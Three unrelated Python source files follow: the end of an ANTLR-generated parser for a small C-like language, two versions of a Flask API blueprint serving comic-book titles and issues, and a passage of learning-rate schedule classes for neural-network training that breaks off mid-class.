    def exitRule(self, listener:ParseTreeListener):
        if hasattr( listener, "exitReturnStmt" ):
            listener.exitReturnStmt(self)
def returnStmt(self):
    """Parse `returnStmt`: RETURN expression? . ANTLR-generated; do not hand-edit."""
    localctx = SmallCParser.ReturnStmtContext(self, self._ctx, self.state)
    self.enterRule(localctx, 80, self.RULE_returnStmt)
    self._la = 0 # Token type
    try:
        self.enterOuterAlt(localctx, 1)
        self.state = 514
        self.match(SmallCParser.RETURN)
        self.state = 516
        _la = self._input.LA(1)
        # Parse the optional return expression when the lookahead can start one.
        if (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << SmallCParser.T__9) | (1 << SmallCParser.T__10) | (1 << SmallCParser.T__11) | (1 << SmallCParser.T__14) | (1 << SmallCParser.T__15) | (1 << SmallCParser.T__16) | (1 << SmallCParser.T__17) | (1 << SmallCParser.LBRA) | (1 << SmallCParser.INTEGER) | (1 << SmallCParser.FLOAT) | (1 << SmallCParser.IDENTIFIER) | (1 << SmallCParser.CHARACTER) | (1 << SmallCParser.STRING))) != 0):
            self.state = 515
            self.expression()
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class ArgumentsContext(ParserRuleContext):
    """ANTLR-generated parse-tree context for the `arguments` grammar rule."""

    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser

    def expression(self, i:int=None):
        # i is None -> all argument expressions; otherwise the i-th one.
        if i is None:
            return self.getTypedRuleContexts(SmallCParser.ExpressionContext)
        else:
            return self.getTypedRuleContext(SmallCParser.ExpressionContext,i)

    def getRuleIndex(self):
        return SmallCParser.RULE_arguments

    def enterRule(self, listener:ParseTreeListener):
        if hasattr( listener, "enterArguments" ):
            listener.enterArguments(self)

    def exitRule(self, listener:ParseTreeListener):
        if hasattr( listener, "exitArguments" ):
            listener.exitArguments(self)
def arguments(self):
    """Parse `arguments`: expression (',' expression)* | <empty, before ')'>.

    ANTLR-generated; do not hand-edit.
    """
    localctx = SmallCParser.ArgumentsContext(self, self._ctx, self.state)
    self.enterRule(localctx, 82, self.RULE_arguments)
    self._la = 0 # Token type
    try:
        self.state = 527
        token = self._input.LA(1)
        if token in [SmallCParser.T__9, SmallCParser.T__10, SmallCParser.T__11, SmallCParser.T__14, SmallCParser.T__15, SmallCParser.T__16, SmallCParser.T__17, SmallCParser.LBRA, SmallCParser.INTEGER, SmallCParser.FLOAT, SmallCParser.IDENTIFIER, SmallCParser.CHARACTER, SmallCParser.STRING]:
            # Alt 1: one or more comma-separated argument expressions.
            self.enterOuterAlt(localctx, 1)
            self.state = 518
            self.expression()
            self.state = 523
            self._errHandler.sync(self)
            _la = self._input.LA(1)
            while _la==SmallCParser.COMMA:
                self.state = 519
                self.match(SmallCParser.COMMA)
                self.state = 520
                self.expression()
                self.state = 525
                self._errHandler.sync(self)
                _la = self._input.LA(1)
        elif token in [SmallCParser.RBRA]:
            # Alt 2: empty argument list (next token closes the call).
            self.enterOuterAlt(localctx, 2)
        else:
            raise NoViableAltException(self)
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class FunctionCallContext(ParserRuleContext):
    """ANTLR-generated parse-tree context for the `functionCall` grammar rule."""

    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser

    def identifier(self):
        return self.getTypedRuleContext(SmallCParser.IdentifierContext,0)

    def LBRA(self):
        return self.getToken(SmallCParser.LBRA, 0)

    def arguments(self):
        return self.getTypedRuleContext(SmallCParser.ArgumentsContext,0)

    def RBRA(self):
        return self.getToken(SmallCParser.RBRA, 0)

    def getRuleIndex(self):
        return SmallCParser.RULE_functionCall

    def enterRule(self, listener:ParseTreeListener):
        if hasattr( listener, "enterFunctionCall" ):
            listener.enterFunctionCall(self)

    def exitRule(self, listener:ParseTreeListener):
        if hasattr( listener, "exitFunctionCall" ):
            listener.exitFunctionCall(self)
def functionCall(self):
    """Parse `functionCall`: identifier LBRA arguments RBRA. ANTLR-generated."""
    localctx = SmallCParser.FunctionCallContext(self, self._ctx, self.state)
    self.enterRule(localctx, 84, self.RULE_functionCall)
    try:
        self.enterOuterAlt(localctx, 1)
        self.state = 529
        self.identifier()
        self.state = 530
        self.match(SmallCParser.LBRA)
        self.state = 531
        self.arguments()
        self.state = 532
        self.match(SmallCParser.RBRA)
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class VariableContext(ParserRuleContext):
    """ANTLR-generated parse-tree context for the `variable` grammar rule."""

    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser

    def identifier(self):
        return self.getTypedRuleContext(SmallCParser.IdentifierContext,0)

    def getRuleIndex(self):
        return SmallCParser.RULE_variable

    def enterRule(self, listener:ParseTreeListener):
        if hasattr( listener, "enterVariable" ):
            listener.enterVariable(self)

    def exitRule(self, listener:ParseTreeListener):
        if hasattr( listener, "exitVariable" ):
            listener.exitVariable(self)
def variable(self):
    """Parse `variable`: a single identifier. ANTLR-generated."""
    localctx = SmallCParser.VariableContext(self, self._ctx, self.state)
    self.enterRule(localctx, 86, self.RULE_variable)
    try:
        self.enterOuterAlt(localctx, 1)
        self.state = 534
        self.identifier()
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class IdentifierContext(ParserRuleContext):
    """ANTLR-generated parse-tree context for the `identifier` grammar rule."""

    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser

    def IDENTIFIER(self):
        return self.getToken(SmallCParser.IDENTIFIER, 0)

    def getRuleIndex(self):
        return SmallCParser.RULE_identifier

    def enterRule(self, listener:ParseTreeListener):
        if hasattr( listener, "enterIdentifier" ):
            listener.enterIdentifier(self)

    def exitRule(self, listener:ParseTreeListener):
        if hasattr( listener, "exitIdentifier" ):
            listener.exitIdentifier(self)
def identifier(self):
    """Parse `identifier`: match a single IDENTIFIER token. ANTLR-generated."""
    localctx = SmallCParser.IdentifierContext(self, self._ctx, self.state)
    self.enterRule(localctx, 88, self.RULE_identifier)
    try:
        self.enterOuterAlt(localctx, 1)
        self.state = 536
        self.match(SmallCParser.IDENTIFIER)
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class PointerContext(ParserRuleContext):
    """ANTLR-generated parse-tree context for the `pointer` grammar rule."""

    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser

    def getRuleIndex(self):
        return SmallCParser.RULE_pointer

    def enterRule(self, listener:ParseTreeListener):
        if hasattr( listener, "enterPointer" ):
            listener.enterPointer(self)

    def exitRule(self, listener:ParseTreeListener):
        if hasattr( listener, "exitPointer" ):
            listener.exitPointer(self)
def pointer(self):
    """Parse `pointer`: match the T__11 literal (presumably '*' — confirm in grammar)."""
    localctx = SmallCParser.PointerContext(self, self._ctx, self.state)
    self.enterRule(localctx, 90, self.RULE_pointer)
    try:
        self.enterOuterAlt(localctx, 1)
        self.state = 538
        self.match(SmallCParser.T__11)
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class TypeDeclarationContext(ParserRuleContext):
    """ANTLR-generated parse-tree context for the `typeDeclaration` grammar rule."""

    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser

    def TYPECHAR(self):
        return self.getToken(SmallCParser.TYPECHAR, 0)

    def TYPEFLOAT(self):
        return self.getToken(SmallCParser.TYPEFLOAT, 0)

    def TYPEINT(self):
        return self.getToken(SmallCParser.TYPEINT, 0)

    def TYPEVOID(self):
        return self.getToken(SmallCParser.TYPEVOID, 0)

    def getRuleIndex(self):
        return SmallCParser.RULE_typeDeclaration

    def enterRule(self, listener:ParseTreeListener):
        if hasattr( listener, "enterTypeDeclaration" ):
            listener.enterTypeDeclaration(self)

    def exitRule(self, listener:ParseTreeListener):
        if hasattr( listener, "exitTypeDeclaration" ):
            listener.exitTypeDeclaration(self)
def typeDeclaration(self):
    """Parse `typeDeclaration`: TYPECHAR | TYPEFLOAT | TYPEINT | TYPEVOID.

    ANTLR-generated; do not hand-edit.
    """
    localctx = SmallCParser.TypeDeclarationContext(self, self._ctx, self.state)
    self.enterRule(localctx, 92, self.RULE_typeDeclaration)
    self._la = 0 # Token type
    try:
        self.enterOuterAlt(localctx, 1)
        self.state = 540
        _la = self._input.LA(1)
        # Token-set match: the lookahead must be one of the four type keywords.
        if not((((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << SmallCParser.TYPECHAR) | (1 << SmallCParser.TYPEFLOAT) | (1 << SmallCParser.TYPEINT) | (1 << SmallCParser.TYPEVOID))) != 0)):
            self._errHandler.recoverInline(self)
        else:
            self.consume()
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class FloatLiteralContext(ParserRuleContext):
    """ANTLR-generated parse-tree context for the `floatLiteral` grammar rule."""

    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser

    def FLOAT(self):
        return self.getToken(SmallCParser.FLOAT, 0)

    def getRuleIndex(self):
        return SmallCParser.RULE_floatLiteral

    def enterRule(self, listener:ParseTreeListener):
        if hasattr( listener, "enterFloatLiteral" ):
            listener.enterFloatLiteral(self)

    def exitRule(self, listener:ParseTreeListener):
        if hasattr( listener, "exitFloatLiteral" ):
            listener.exitFloatLiteral(self)
def floatLiteral(self):
    """Parse `floatLiteral`: match a single FLOAT token. ANTLR-generated."""
    localctx = SmallCParser.FloatLiteralContext(self, self._ctx, self.state)
    self.enterRule(localctx, 94, self.RULE_floatLiteral)
    try:
        self.enterOuterAlt(localctx, 1)
        self.state = 542
        self.match(SmallCParser.FLOAT)
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class IntegerLiteralContext(ParserRuleContext):
    """ANTLR-generated parse-tree context for the `integerLiteral` grammar rule."""

    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser

    def INTEGER(self):
        return self.getToken(SmallCParser.INTEGER, 0)

    def getRuleIndex(self):
        return SmallCParser.RULE_integerLiteral

    def enterRule(self, listener:ParseTreeListener):
        if hasattr( listener, "enterIntegerLiteral" ):
            listener.enterIntegerLiteral(self)

    def exitRule(self, listener:ParseTreeListener):
        if hasattr( listener, "exitIntegerLiteral" ):
            listener.exitIntegerLiteral(self)
def integerLiteral(self):
    """Parse `integerLiteral`: match a single INTEGER token. ANTLR-generated."""
    localctx = SmallCParser.IntegerLiteralContext(self, self._ctx, self.state)
    self.enterRule(localctx, 96, self.RULE_integerLiteral)
    try:
        self.enterOuterAlt(localctx, 1)
        self.state = 544
        self.match(SmallCParser.INTEGER)
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class CharacterLiteralContext(ParserRuleContext):
    """ANTLR-generated parse-tree context for the `characterLiteral` grammar rule."""

    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser

    def CHARACTER(self):
        return self.getToken(SmallCParser.CHARACTER, 0)

    def getRuleIndex(self):
        return SmallCParser.RULE_characterLiteral

    def enterRule(self, listener:ParseTreeListener):
        if hasattr( listener, "enterCharacterLiteral" ):
            listener.enterCharacterLiteral(self)

    def exitRule(self, listener:ParseTreeListener):
        if hasattr( listener, "exitCharacterLiteral" ):
            listener.exitCharacterLiteral(self)
def characterLiteral(self):
    """Parse `characterLiteral`: match a single CHARACTER token. ANTLR-generated."""
    localctx = SmallCParser.CharacterLiteralContext(self, self._ctx, self.state)
    self.enterRule(localctx, 98, self.RULE_characterLiteral)
    try:
        self.enterOuterAlt(localctx, 1)
        self.state = 546
        self.match(SmallCParser.CHARACTER)
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class StringLiteralContext(ParserRuleContext):
    """ANTLR-generated parse-tree context for the `stringLiteral` grammar rule."""

    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser

    def STRING(self):
        return self.getToken(SmallCParser.STRING, 0)

    def getRuleIndex(self):
        return SmallCParser.RULE_stringLiteral

    def enterRule(self, listener:ParseTreeListener):
        if hasattr( listener, "enterStringLiteral" ):
            listener.enterStringLiteral(self)

    def exitRule(self, listener:ParseTreeListener):
        if hasattr( listener, "exitStringLiteral" ):
            listener.exitStringLiteral(self)
def stringLiteral(self):
    """Parse `stringLiteral`: match a single STRING token. ANTLR-generated."""
    localctx = SmallCParser.StringLiteralContext(self, self._ctx, self.state)
    self.enterRule(localctx, 100, self.RULE_stringLiteral)
    try:
        self.enterOuterAlt(localctx, 1)
        self.state = 548
        self.match(SmallCParser.STRING)
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
def sempred(self, localctx:RuleContext, ruleIndex:int, predIndex:int):
    """Dispatch semantic (precedence) predicates for left-recursive rules.

    ANTLR-generated; the ruleIndex -> handler table is built lazily on first use.
    """
    if self._predicates == None:
        self._predicates = dict()
        self._predicates[3] = self.oplevel12_sempred
        self._predicates[4] = self.oplevel11_sempred
        self._predicates[8] = self.oplevel7_sempred
        self._predicates[9] = self.oplevel6_sempred
        self._predicates[11] = self.oplevel4_sempred
        self._predicates[12] = self.oplevel3_sempred
        self._predicates[14] = self.oplevel1_sempred
    pred = self._predicates.get(ruleIndex, None)
    if pred is None:
        raise Exception("No predicate with index:" + str(ruleIndex))
    else:
        return pred(localctx, predIndex)
def oplevel12_sempred(self, localctx:Oplevel12Context, predIndex:int):
    """Precedence predicate for the left-recursive `oplevel12` rule (generated)."""
    if predIndex == 0:
        return self.precpred(self._ctx, 2)
def oplevel11_sempred(self, localctx:Oplevel11Context, predIndex:int):
    """Precedence predicate for the left-recursive `oplevel11` rule (generated)."""
    if predIndex == 1:
        return self.precpred(self._ctx, 2)
def oplevel7_sempred(self, localctx:Oplevel7Context, predIndex:int):
    """Precedence predicates for the left-recursive `oplevel7` rule (generated)."""
    if predIndex == 2:
        return self.precpred(self._ctx, 3)
    if predIndex == 3:
        return self.precpred(self._ctx, 2)
def oplevel6_sempred(self, localctx:Oplevel6Context, predIndex:int):
    """Precedence predicates for the left-recursive `oplevel6` rule (generated)."""
    if predIndex == 4:
        return self.precpred(self._ctx, 5)
    if predIndex == 5:
        return self.precpred(self._ctx, 4)
    if predIndex == 6:
        return self.precpred(self._ctx, 3)
    if predIndex == 7:
        return self.precpred(self._ctx, 2)
def oplevel4_sempred(self, localctx:Oplevel4Context, predIndex:int):
    """Precedence predicates for the left-recursive `oplevel4` rule (generated)."""
    if predIndex == 8:
        return self.precpred(self._ctx, 3)
    if predIndex == 9:
        return self.precpred(self._ctx, 2)
def oplevel3_sempred(self, localctx:Oplevel3Context, predIndex:int):
    """Precedence predicates for the left-recursive `oplevel3` rule (generated)."""
    if predIndex == 10:
        return self.precpred(self._ctx, 4)
    if predIndex == 11:
        return self.precpred(self._ctx, 3)
    if predIndex == 12:
        return self.precpred(self._ctx, 2)
def oplevel1_sempred(self, localctx:Oplevel1Context, predIndex:int):
    """Precedence predicates for the left-recursive `oplevel1` rule (generated)."""
    if predIndex == 13:
        return self.precpred(self._ctx, 9)
    if predIndex == 14:
        return self.precpred(self._ctx, 8)
    if predIndex == 15:
        return self.precpred(self._ctx, 7)
|
# -*- coding: utf-8 -*-
"""
longboxed.api.titles
~~~~~~~~~~~~~~~~~~~~
Title endpoints
"""
from datetime import datetime
from flask import current_app, Blueprint, jsonify, request
from sqlalchemy.orm.exc import NoResultFound
from ..helpers import current_wednesday, next_wednesday, after_wednesday
from ..models import Title, Issue, Publisher
from .errors import bad_request
from . import route
# Blueprint grouping all /titles endpoints under the /titles URL prefix.
bp = Blueprint('titles', __name__, url_prefix='/titles')
@route(bp, '/')
def get_titles():
    """Return a paginated JSON listing of titles.

    Query params: `page` (default 1) and `count` (default 50). Titles whose
    publisher appears in the DISABLED_PUBS config list are excluded.
    """
    page = request.args.get('page', 1, type=int)
    count = request.args.get('count', 50, type=int)
    disabled_pubs = current_app.config.get('DISABLED_PUBS', [])
    # Join to the publisher so disabled publishers can be filtered out.
    pagination = Title.query.join(Title.publisher)\
                            .filter(Publisher.name.notin_(disabled_pubs))\
                            .order_by(Title.name)\
                            .paginate(page, per_page=count, error_out=False)
    # Page links are None when there is no previous/next page.
    # (Renamed from `next` to avoid shadowing the builtin; removed the
    # commented-out unfiltered query.)
    prev_page = page - 1 if pagination.has_prev else None
    next_page = page + 1 if pagination.has_next else None
    return jsonify({
        'titles': [title.to_json() for title in pagination.items],
        'prev': prev_page,
        'next': next_page,
        'total': pagination.total,
        'count': count
    })
@route(bp, '/<int:id>')
def get_title(id):
    """Return one title as JSON; 404 if unknown, 400 if its publisher is disabled."""
    title = Title.query.get_or_404(id)
    disabled = current_app.config.get('DISABLED_PUBS', [])
    if title.publisher.name in disabled:
        return bad_request('Titles not available from this publisher')
    return jsonify({'title': title.to_json()})
@route(bp, '/<int:id>/issues/')
def get_issues_for_title(id):
    """Return a paginated JSON listing of a title's released parent issues.

    Issues are limited to on-sale dates up to the current (or, after Wednesday,
    the next) comic-release Wednesday, newest first. 404 for an unknown title,
    400 when the title's publisher is disabled.
    """
    title = Title.query.get_or_404(id)
    if title.publisher.name in current_app.config.get('DISABLED_PUBS', []):
        return bad_request('Titles not available from this publisher')
    page = request.args.get('page', 1, type=int)
    count = request.args.get('count', 50, type=int)
    # Maximum on-sale date to include: this week's or next week's Wednesday.
    if after_wednesday(datetime.today().date()):
        date = next_wednesday()
    else:
        date = current_wednesday()
    pagination = Issue.query.filter(
        Issue.title==title,
        Issue.is_parent==True,
        Issue.on_sale_date <= date,
        Issue.on_sale_date != None)\
        .order_by(Issue.on_sale_date.desc())\
        .paginate(page, per_page=count, error_out=False)
    # Renamed from `next` to avoid shadowing the builtin; JSON keys unchanged.
    prev_page = page - 1 if pagination.has_prev else None
    next_page = page + 1 if pagination.has_next else None
    return jsonify({
        'title': title.name,
        'issues': [issue.to_json() for issue in pagination.items],
        'prev': prev_page,
        'next': next_page,
        'total': pagination.total,
        'count': count
    })
@route(bp, '/autocomplete/', methods=['GET'])
def autocomplete():
    """Suggest up to 10 titles matching the `query` parameter.

    The query's words are joined with SQL LIKE wildcards so they may appear in
    order anywhere in the title name; titles from disabled publishers are
    excluded and results are ordered by subscriber count.
    """
    if 'query' not in request.args:
        return bad_request('Must submit a \'query\' parameter!')
    disabled_pubs = current_app.config.get('DISABLED_PUBS', [])
    fragment = request.args.get('query')
    # 'amazing man' -> '%amazing%man%'. The original built '%%'-doubled
    # wildcards, which LIKE treats the same as a single '%'; single '%' is
    # equivalent and clearer. Removed the commented-out unfiltered query.
    searchstring = '%' + '%'.join(fragment.split()) + '%'
    try:
        res = Title.query.filter(Title.name.ilike(searchstring))\
                         .join(Title.publisher)\
                         .filter(Publisher.name.notin_(disabled_pubs))\
                         .order_by(Title.num_subscribers.desc())\
                         .limit(10)\
                         .all()
        return jsonify({
            'query': fragment,
            'suggestions': [r.to_json() for r in res],
        })
    except NoResultFound:
        # NOTE(review): .all() does not raise NoResultFound; kept as a
        # defensive fallback to preserve existing behavior.
        return jsonify({'query': fragment, 'suggestions': []})
# commit: added test method to the Title blueprint for testing caching
# -*- coding: utf-8 -*-
"""
longboxed.api.titles
~~~~~~~~~~~~~~~~~~~~
Title endpoints
"""
from datetime import datetime
from flask import current_app, Blueprint, jsonify, request
from sqlalchemy.orm.exc import NoResultFound
from ..core import cache
from ..helpers import (current_wednesday, next_wednesday, after_wednesday,
make_cache_key)
from ..models import Title, Issue, Publisher
from .errors import bad_request
from . import route
# Blueprint grouping all /titles endpoints under the /titles URL prefix.
bp = Blueprint('titles', __name__, url_prefix='/titles')
@route(bp, '/test/<int:id>')
@cache.cached(timeout=30, key_prefix=make_cache_key)
def test(id):
    # Scratch endpoint for verifying the cache wiring: the print (Python 2)
    # only fires on a cache miss; a cached hit returns the stored response.
    # NOTE(review): int() on a missing 'a'/'b' query arg raises -> 500;
    # acceptable for a test route, but confirm before shipping.
    print 'NOT CACHE'
    a = int(request.args.get('a'))
    b = int(request.args.get('b'))
    return str(a + b + id)
@route(bp, '/')
@cache.cached(timeout=300, key_prefix=make_cache_key)
def get_titles():
    """Paginated JSON listing of titles (response cached for 300s per key)."""
    print 'NOT CACHE'  # debug marker: printed only on a cache miss (Python 2 print)
    page = request.args.get('page', 1, type=int)
    count = request.args.get('count', 50, type=int)
    disabled_pubs = current_app.config.get('DISABLED_PUBS', [])
    #pagination = Title.query.order_by(Title.name)\
    #           .paginate(page, per_page=count, error_out=False)
    # Join to the publisher so disabled publishers can be filtered out.
    pagination = Title.query.join(Title.publisher)\
                            .filter(Publisher.name.notin_(disabled_pubs))\
                            .order_by(Title.name)\
                            .paginate(page, per_page=count, error_out=False)
    titles = pagination.items
    # prev/next are page numbers for the adjacent pages, or None at the edges.
    prev = None
    if pagination.has_prev:
        prev = page-1
    next = None
    if pagination.has_next:
        next = page+1
    return jsonify({
        'titles': [title.to_json() for title in titles],
        'prev': prev,
        'next': next,
        'total': pagination.total,
        'count': count
    })
@route(bp, '/<int:id>')
def get_title(id):
    """Return one title as JSON; 404 if unknown, 400 if its publisher is disabled."""
    title = Title.query.get_or_404(id)
    if title.publisher.name in current_app.config.get('DISABLED_PUBS', []):
        return bad_request('Titles not available from this publisher')
    return jsonify({
        'title': title.to_json()
    })
@route(bp, '/<int:id>/issues/')
def get_issues_for_title(id):
    """Paginated JSON listing of a title's released parent issues, newest first."""
    title = Title.query.get_or_404(id)
    if title.publisher.name in current_app.config.get('DISABLED_PUBS', []):
        return bad_request('Titles not available from this publisher')
    page = request.args.get('page', 1, type=int)
    count = request.args.get('count', 50, type=int)
    # Set the maximum date to search for issues (This week or next week)
    if after_wednesday(datetime.today().date()):
        date = next_wednesday()
    else:
        date = current_wednesday()
    # Only parent issues with a known on-sale date up to `date` are included.
    pagination = Issue.query.filter(
        Issue.title==title,
        Issue.is_parent==True,
        Issue.on_sale_date <= date,
        Issue.on_sale_date != None)\
        .order_by(Issue.on_sale_date.desc())\
        .paginate(page, per_page=count, error_out=False)
    issues = pagination.items
    # prev/next are page numbers for the adjacent pages, or None at the edges.
    prev = None
    if pagination.has_prev:
        prev = page-1
    next = None
    if pagination.has_next:
        next = page+1
    return jsonify({
        'title': title.name,
        'issues': [issue.to_json() for issue in issues],
        'prev': prev,
        'next': next,
        'total': pagination.total,
        'count': count
    })
@route(bp, '/autocomplete/', methods=['GET'])
def autocomplete():
    """Suggest up to 10 titles matching the `query` parameter (LIKE search)."""
    if 'query' not in request.args.keys():
        return bad_request('Must submit a \'query\' parameter!')
    disabled_pubs = current_app.config.get('DISABLED_PUBS', [])
    fragment = request.args.get('query')
    keywords = fragment.split()
    # Builds '%%kw1%%kw2%%'-style pattern; LIKE treats '%%' like '%', so
    # words may appear in order anywhere in the name.
    searchstring = '%%'.join(keywords)
    searchstring = '%%%s%%' % (searchstring)
    try:
        #res = Title.query.filter(Title.name.ilike(searchstring))\
        #       .order_by(Title.num_subscribers.desc())\
        #       .limit(20)\
        #       .all()
        res = Title.query.filter(Title.name.ilike(searchstring))\
                         .join(Title.publisher)\
                         .filter(Publisher.name.notin_(disabled_pubs))\
                         .order_by(Title.num_subscribers.desc())\
                         .limit(10)\
                         .all()
        return jsonify({
            'query': fragment,
            'suggestions': [r.to_json() for r in res],
        })
    except NoResultFound:
        # NOTE(review): .all() does not raise NoResultFound — dead fallback.
        return jsonify({'query': fragment, 'suggestions':[]})
|
# Copyright 2014 Yajie Miao Carnegie Mellon University
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# THIS CODE IS PROVIDED *AS IS* BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, EITHER EXPRESS OR IMPLIED, INCLUDING WITHOUT LIMITATION ANY IMPLIED
# WARRANTIES OR CONDITIONS OF TITLE, FITNESS FOR A PARTICULAR PURPOSE,
# MERCHANTABLITY OR NON-INFRINGEMENT.
# See the Apache 2 License for the specific language governing permissions and
# limitations under the License.
import cPickle
class LearningRate(object):
    """Abstract base for learning-rate schedules.

    Subclasses override get_rate() to report the current rate and
    get_next_rate() to advance the schedule after each epoch.
    """

    def __init__(self):
        """Nothing to initialize in the base class."""

    def get_rate(self):
        """Return the current learning rate (base class: no-op)."""
        pass

    def get_next_rate(self, current_error):
        """Advance one epoch given the latest validation error (base class: no-op)."""
        pass
class LearningRateConstant(LearningRate):
    """Constant learning rate for `epoch_num` epochs, then 0.0 to signal stop."""

    def __init__(self, learning_rate = 0.08, epoch_num = 20):
        self.learning_rate = learning_rate
        self.epoch = 1
        self.epoch_num = epoch_num
        self.rate = learning_rate

    def get_rate(self):
        """Return the rate for the current epoch."""
        return self.rate

    def get_next_rate(self, current_error):
        """Advance one epoch; the rate stays constant until the epoch budget runs out."""
        # A zero rate is the conventional "stop training" signal here.
        self.rate = 0.0 if self.epoch >= self.epoch_num else self.learning_rate
        self.epoch += 1
        return self.rate
class LearningRateExpDecay(LearningRate):
    """Exponential decay schedule.

    Decay starts once the per-epoch error improvement drops below
    `min_derror_decay_start` (after `min_epoch_decay_start` epochs); during
    decay the rate is multiplied by `scale_by` each epoch, and the rate is
    forced to 0.0 (stop) once improvement falls below `min_derror_stop`.
    """
    def __init__(self, start_rate = 0.08, scale_by = 0.5,
                 min_derror_decay_start = 0.05, min_derror_stop = 0.05, init_error = 100,
                 decay=False, min_epoch_decay_start=15, zero_rate = 0.0):
        self.start_rate = start_rate
        self.init_error = init_error
        self.rate = start_rate
        self.scale_by = scale_by
        self.min_derror_decay_start = min_derror_decay_start
        self.min_derror_stop = min_derror_stop
        self.lowest_error = init_error  # best (lowest) error observed so far
        self.epoch = 1
        self.decay = decay
        self.zero_rate = zero_rate  # NOTE(review): stored but never read here
        self.min_epoch_decay_start = min_epoch_decay_start

    def get_rate(self):
        """Return the rate for the current epoch."""
        return self.rate

    def get_next_rate(self, current_error):
        """Advance one epoch given the latest error; return the new rate."""
        # Improvement relative to the best error so far (negative if worse).
        diff_error = 0.0
        diff_error = self.lowest_error - current_error
        if (current_error < self.lowest_error):
            self.lowest_error = current_error
        if (self.decay):
            if (diff_error < self.min_derror_stop):
                self.rate = 0.0
            else:
                self.rate *= self.scale_by
        else:
            # Start decaying only after enough epochs AND a small improvement.
            if ((diff_error < self.min_derror_decay_start) and (self.epoch > self.min_epoch_decay_start)):
                self.decay = True
                self.rate *= self.scale_by
        self.epoch += 1
        return self.rate
class LearningMinLrate(LearningRate):
    """Decay schedule that stops once the rate falls below `min_lrate_stop`.

    Decay starts when the per-epoch error improvement drops below
    `min_derror_decay_start` after `min_epoch_decay_start` epochs; during
    decay the rate is scaled by `scale_by`, and set to 0.0 (stop) once it
    drops under `min_lrate_stop`.
    """
    def __init__(self, start_rate = 0.08, scale_by = 0.5,
                 min_derror_decay_start = 0.05,
                 min_lrate_stop = 0.0002, init_error = 100,
                 decay=False, min_epoch_decay_start=15):
        self.start_rate = start_rate
        self.init_error = init_error
        self.rate = start_rate
        self.scale_by = scale_by
        # BUG FIX: removed `self.max_epochs = max_epochs` — `max_epochs` is not
        # a constructor parameter, so that line raised NameError on every
        # instantiation, and the attribute was never read elsewhere.
        self.min_lrate_stop = min_lrate_stop
        self.lowest_error = init_error  # best (lowest) error observed so far
        self.min_derror_decay_start = min_derror_decay_start
        self.epoch = 1
        self.decay = decay
        self.min_epoch_decay_start = min_epoch_decay_start

    def get_rate(self):
        """Return the rate for the current epoch."""
        return self.rate

    def get_next_rate(self, current_error):
        """Advance one epoch given the latest error; return the new rate."""
        diff_error = 0.0
        # Improvement relative to the best error so far (negative if worse).
        diff_error = self.lowest_error - current_error
        if (current_error < self.lowest_error):
            self.lowest_error = current_error
        if (self.decay):
            if (self.rate < self.min_lrate_stop):
                self.rate = 0.0
            else:
                self.rate *= self.scale_by
        else:
            if (diff_error < self.min_derror_decay_start) and (self.epoch >= self.min_epoch_decay_start):
                self.decay = True
                self.rate *= self.scale_by
        self.epoch += 1
        return self.rate
class LearningFixedLrate(LearningRate):
    """Fixed rate until `decay_start_epoch`, then `scale_by` decay for
    `stop_after_deday_epoch` epochs, after which the rate is 0.0 (stop).

    NOTE(review): 'deday' is a typo for 'decay', but the parameter name is
    part of the public interface and is kept for caller compatibility.
    """
    def __init__(self, start_rate = 0.08, scale_by = 0.5,
                 decay_start_epoch = 10, init_error = 100,
                 decay=False, stop_after_deday_epoch=6):
        self.start_rate = start_rate
        self.init_error = init_error
        self.rate = start_rate
        self.scale_by = scale_by
        self.decay_start_epoch = decay_start_epoch
